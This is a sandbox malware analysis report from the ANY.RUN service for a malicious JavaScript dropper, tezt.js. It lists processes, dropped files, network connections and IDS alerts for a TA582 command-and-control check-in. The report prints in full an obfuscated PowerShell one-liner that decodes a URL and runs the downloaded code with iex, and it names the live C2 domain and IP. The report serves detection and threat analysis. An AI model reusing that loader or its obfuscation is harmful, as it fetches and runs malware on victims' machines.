File name:

tezt.js

Full analysis: https://app.any.run/tasks/95ebfbd5-1f80-434a-913f-93fe4044ffc6
Verdict: Malicious activity
Analysis date: December 17, 2024, 15:31:24
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
ta582
apt
Indicators:
MIME: application/javascript
File info: JavaScript source, Unicode text, UTF-8 text, with very long lines (1692)
MD5:

D7B743EEC3B7628729E5DB20473F3EC1

SHA1:

BA9B18C10F82F7F6753BAE68940660449CE54569

SHA256:

C3F407A1AEDC602D21A48C55DBB87B506682CF8A40356A0749285FFA140D3348

SSDEEP:

1536:nwaYD/2U3Rhq2mE6j1pHTZ8bCPeNZYV6Sa3Rhq2qE6j1pHTZ8bCPeNZYV6SZE6jn:nLYdYhV8km5UhV8kmchV8kmOe8

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Gets information about running processes via WMI (SCRIPT)

      • wscript.exe (PID: 2072)
      • wscript.exe (PID: 6320)

    • Execute application with conhost.exe as parent process

      • powershell.exe (PID: 6176)
      • powershell.exe (PID: 6556)

    • Connects to the CnC server

      • powershell.exe (PID: 6176)
      • powershell.exe (PID: 6556)

  • SUSPICIOUS

    • Starts POWERSHELL.EXE for commands execution

      • conhost.exe (PID: 6152)
      • conhost.exe (PID: 6528)

    • Executed via WMI

      • conhost.exe (PID: 6152)
      • conhost.exe (PID: 6528)

    • Creates an object to access WMI (SCRIPT)

      • wscript.exe (PID: 6320)
      • wscript.exe (PID: 2072)

  • INFO

    • Manual execution by a user

      • wscript.exe (PID: 6320)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 6556)
      • powershell.exe (PID: 6176)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
134
Monitored processes
7
Malicious processes
4
Suspicious processes
2

Behavior graph

Click at the process to see the details
start wscript.exe no specs conhost.exe no specs powershell.exe wscript.exe no specs conhost.exe no specs powershell.exe svchost.exe

Process information

PID
CMD
Path
Indicators
Parent process
2072"C:\Windows\System32\WScript.exe" C:\Users\admin\Desktop\tezt.jsC:\Windows\System32\wscript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2192C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
6152conhost --headless powershell $ulqhtsypgkw='ur' ;new-alias printout c$($ulqhtsypgkw)l;$uqcmzhs=(4534,4546,4542,4546,4541,4548,4529,4487,4553,4534,4482,4477,4547,4542,4543,4478,4480,4477,4543,4535,4543,4494,4546,4492,4540,4536,4541,4547,4546,4481,4480);$jadmwnry=('bronx','get-cmdlet');$vegrsyu=$uqcmzhs;foreach($dyizpquhekx in $vegrsyu){$gxlrqsfwmtunoj=$dyizpquhekx;$xfsrhqnp=$xfsrhqnp+[char]($gxlrqsfwmtunoj-4431);$rfdpuzqe=$xfsrhqnp; $dorvmtl=$rfdpuzqe};$frtojcpilvshw[2]=$dorvmtl;$nfzsgeuk='rl';$vquploi=1;.$([char](9992-9887)+'e'+'x')(printout -useb $dorvmtl)C:\Windows\System32\conhost.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6176powershell $ulqhtsypgkw='ur' ;new-alias printout c$($ulqhtsypgkw)l;$uqcmzhs=(4534,4546,4542,4546,4541,4548,4529,4487,4553,4534,4482,4477,4547,4542,4543,4478,4480,4477,4543,4535,4543,4494,4546,4492,4540,4536,4541,4547,4546,4481,4480);$jadmwnry=('bronx','get-cmdlet');$vegrsyu=$uqcmzhs;foreach($dyizpquhekx in $vegrsyu){$gxlrqsfwmtunoj=$dyizpquhekx;$xfsrhqnp=$xfsrhqnp+[char]($gxlrqsfwmtunoj-4431);$rfdpuzqe=$xfsrhqnp; $dorvmtl=$rfdpuzqe};$frtojcpilvshw[2]=$dorvmtl;$nfzsgeuk='rl';$vquploi=1;.$([char](9992-9887)+'e'+'x')(printout -useb $dorvmtl)C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
conhost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6320"C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\tezt.js" C:\Windows\System32\wscript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6528conhost --headless powershell $ulqhtsypgkw='ur' ;new-alias printout c$($ulqhtsypgkw)l;$uqcmzhs=(4534,4546,4542,4546,4541,4548,4529,4487,4553,4534,4482,4477,4547,4542,4543,4478,4480,4477,4543,4535,4543,4494,4546,4492,4540,4536,4541,4547,4546,4481,4480);$jadmwnry=('bronx','get-cmdlet');$vegrsyu=$uqcmzhs;foreach($dyizpquhekx in $vegrsyu){$gxlrqsfwmtunoj=$dyizpquhekx;$xfsrhqnp=$xfsrhqnp+[char]($gxlrqsfwmtunoj-4431);$rfdpuzqe=$xfsrhqnp; $dorvmtl=$rfdpuzqe};$frtojcpilvshw[2]=$dorvmtl;$nfzsgeuk='rl';$vquploi=1;.$([char](9992-9887)+'e'+'x')(printout -useb $dorvmtl)C:\Windows\System32\conhost.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6556powershell $ulqhtsypgkw='ur' ;new-alias printout c$($ulqhtsypgkw)l;$uqcmzhs=(4534,4546,4542,4546,4541,4548,4529,4487,4553,4534,4482,4477,4547,4542,4543,4478,4480,4477,4543,4535,4543,4494,4546,4492,4540,4536,4541,4547,4546,4481,4480);$jadmwnry=('bronx','get-cmdlet');$vegrsyu=$uqcmzhs;foreach($dyizpquhekx in $vegrsyu){$gxlrqsfwmtunoj=$dyizpquhekx;$xfsrhqnp=$xfsrhqnp+[char]($gxlrqsfwmtunoj-4431);$rfdpuzqe=$xfsrhqnp; $dorvmtl=$rfdpuzqe};$frtojcpilvshw[2]=$dorvmtl;$nfzsgeuk='rl';$vquploi=1;.$([char](9992-9887)+'e'+'x')(printout -useb $dorvmtl)C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
conhost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
10 065
Read events
10 064
Write events
1
Delete events
0

Modification events

(PID) Process:(2072) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
Operation:writeName:JScriptSetScriptStateStarted
Value:
7E80130000000000
Executable files
0
Suspicious files
1
Text files
4
Unknown types
0

Dropped files

PID
Process
Filename
Type
6556powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_4fblvzry.xpl.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6176powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:807D04115BABFBC1D6FBE15A6D952A04
SHA256:8AF7080978097C56CF9BF850E568C5EB71C75919EC0C90C3B5410A34767CBDBE
6176powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_sphq41op.uhb.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6556powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_11mpgm1m.gko.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6176powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_r3ckyav1.ki5.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
9
TCP/UDP connections
31
DNS requests
16
Threats
8

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
5064
SearchApp.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
6556
powershell.exe
GET
302
193.149.129.61:80
http://gsosnub8zg3.top/1.php?s=mints21
unknown
unknown
6176
powershell.exe
GET
302
193.149.129.61:80
http://gsosnub8zg3.top/1.php?s=mints21
unknown
unknown
6176
powershell.exe
GET
200
172.217.16.196:80
http://www.google.com/
unknown
whitelisted
6972
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
6444
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted
6556
powershell.exe
GET
200
172.217.16.196:80
http://www.google.com/
unknown
whitelisted
6972
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
192.168.100.255:138
whitelisted
20.73.194.208:443
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
5064
SearchApp.exe
104.126.37.179:443
www.bing.com
Akamai International B.V.
DE
whitelisted
1076
svchost.exe
23.213.166.81:443
go.microsoft.com
AKAMAI-AS
DE
whitelisted
5064
SearchApp.exe
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted
40.126.31.69:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted
6556
powershell.exe
193.149.129.61:80
gsosnub8zg3.top
BLNWX
NL
unknown
6176
powershell.exe
193.149.129.61:80
gsosnub8zg3.top
BLNWX
NL
unknown
6176
powershell.exe
172.217.16.196:80
www.google.com
GOOGLE
US
whitelisted

DNS requests

Domain
IP
Reputation
google.com
  • 172.217.18.110
whitelisted
www.bing.com
  • 104.126.37.179
  • 104.126.37.170
  • 104.126.37.177
  • 104.126.37.178
  • 104.126.37.163
  • 104.126.37.160
  • 104.126.37.152
  • 104.126.37.168
  • 104.126.37.171
  • 104.126.37.185
  • 104.126.37.186
  • 104.126.37.123
  • 104.126.37.128
whitelisted
go.microsoft.com
  • 23.213.166.81
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
login.live.com
  • 40.126.31.69
  • 20.190.159.75
  • 40.126.31.71
  • 20.190.159.0
  • 20.190.159.68
  • 40.126.31.67
  • 20.190.159.71
  • 20.190.159.23
whitelisted
gsosnub8zg3.top
  • 193.149.129.61
unknown
www.google.com
  • 172.217.16.196
whitelisted
slscr.update.microsoft.com
  • 4.245.163.56
whitelisted
www.microsoft.com
  • 184.30.21.171
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 13.95.31.18
whitelisted

Threats

PID
Process
Class
Message
2192
svchost.exe
Potentially Bad Traffic
ET DNS Query to a *.top domain - Likely Hostile
6176
powershell.exe
Potentially Bad Traffic
ET INFO HTTP Request to a *.top domain
6176
powershell.exe
A Network Trojan was detected
ET MALWARE TA582 CnC Checkin
6176
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
6176
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
6556
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
6556
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
6556
powershell.exe
A Network Trojan was detected
ET MALWARE TA582 CnC Checkin
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
tezt.js